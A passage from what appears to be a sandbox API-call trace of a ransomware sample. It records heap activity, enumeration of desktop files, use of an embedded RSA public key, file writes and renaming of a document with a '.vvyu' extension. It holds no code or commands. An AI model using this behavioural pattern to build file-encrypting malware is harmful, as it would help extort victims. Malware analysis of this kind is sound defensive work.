Flags=0x0, Size=0x64) returned 0x6fab90 [0184.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0184.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0184.102] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0184.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0184.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82c70 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e900 [0184.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8a0 [0184.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0184.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.103] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8b8 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e918 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8e8 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e930 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8d0 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8e8 | out: hHeap=0x6a0000) returned 1 [0184.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0184.104] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8a0 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e900 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e930 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d41908 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0184.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8a0 | out: hHeap=0x6a0000) returned 1 [0184.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d41b20 [0184.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0184.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0184.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0184.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0184.106] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0184.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0184.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0184.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0184.107] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41b20 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e888 | out: hHeap=0x6a0000) returned 1 [0184.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0184.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0184.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0184.109] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e870 | out: hHeap=0x6a0000) returned 1 [0184.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31210 | out: hHeap=0x6a0000) returned 1 [0184.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0184.110] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0184.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0184.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0184.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0184.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0184.111] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0184.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0184.112] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0184.113] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0x6d4d, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0x6d4d, lpOverlapped=0x0) returned 1 [0184.113] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0184.114] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x6d52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.114] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0184.114] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0184.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d41908 [0184.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d41908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0184.114] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d41d38 [0184.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.115] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0184.115] WriteFile (in: hFile=0x584, lpBuffer=0x2d41d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d41d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0184.116] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41d38 | out: hHeap=0x6a0000) returned 1 [0184.116] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0184.116] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0184.116] CloseHandle (hObject=0x584) returned 1 [0184.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c70 [0184.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d41908 [0184.118] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82c70 | out: hHeap=0x6a0000) returned 1 [0184.118] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\vku7O.doc" (normalized: "c:\\users\\keecfmwgj\\desktop\\vku7o.doc"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\vku7O.doc.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\vku7o.doc.vvyu")) returned 1 [0184.120] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.121] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.121] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0184.124] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110ed630, ftCreationTime.dwHighDateTime=0x1d89781, ftLastAccessTime.dwLowDateTime=0x99bd1af0, ftLastAccessTime.dwHighDateTime=0x1d897bd, ftLastWriteTime.dwLowDateTime=0x99bd1af0, ftLastWriteTime.dwHighDateTime=0x1d897bd, nFileSizeHigh=0x0, nFileSizeLow=0x1573c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xC6Y6diW-2mP3g1eZ.mkv", cAlternateFileName="XC6Y6D~1.MKV")) returned 1 [0184.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31210 [0184.124] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b6b8 [0184.124] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31210 | out: hHeap=0x6a0000) returned 1 [0184.124] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\xC6Y6diW-2mP3g1eZ.mkv") returned=".mkv" [0184.124] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\xC6Y6diW-2mP3g1eZ.mkv" (normalized: "c:\\users\\keecfmwgj\\desktop\\xc6y6diw-2mp3g1ez.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0184.125] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=87868) returned 1 [0184.125] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0184.128] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x15716, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.128] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0184.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.130] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.130] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0184.130] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x1573c, lpOverlapped=0x0) returned 1 [0184.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.131] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0184.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.131] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0184.131] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0184.132] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0184.132] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0184.133] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0184.133] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0184.133] GetLastError () returned 0x0 [0184.133] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0184.133] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0184.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0184.133] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0184.133] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0184.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.133] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0184.133] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0184.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0184.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x15740) returned 0x2d43778 [0184.134] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0184.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0184.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0184.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31210 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e870 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d31258 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e888 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8b8 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e8d0 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0184.135] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3b920 [0184.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d41908 [0184.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8b8 | out: hHeap=0x6a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e8d0 | out: hHeap=0x6a0000) returned 1 [0184.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e918 | out: hHeap=0x6a0000) returned 1 [0184.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0184.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d41908 | out: hHeap=0x6a0000) returned 1 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e918 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e8d0 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e8b8 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0184.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0184.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0184.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0184.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0184.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0184.138] HeapFree 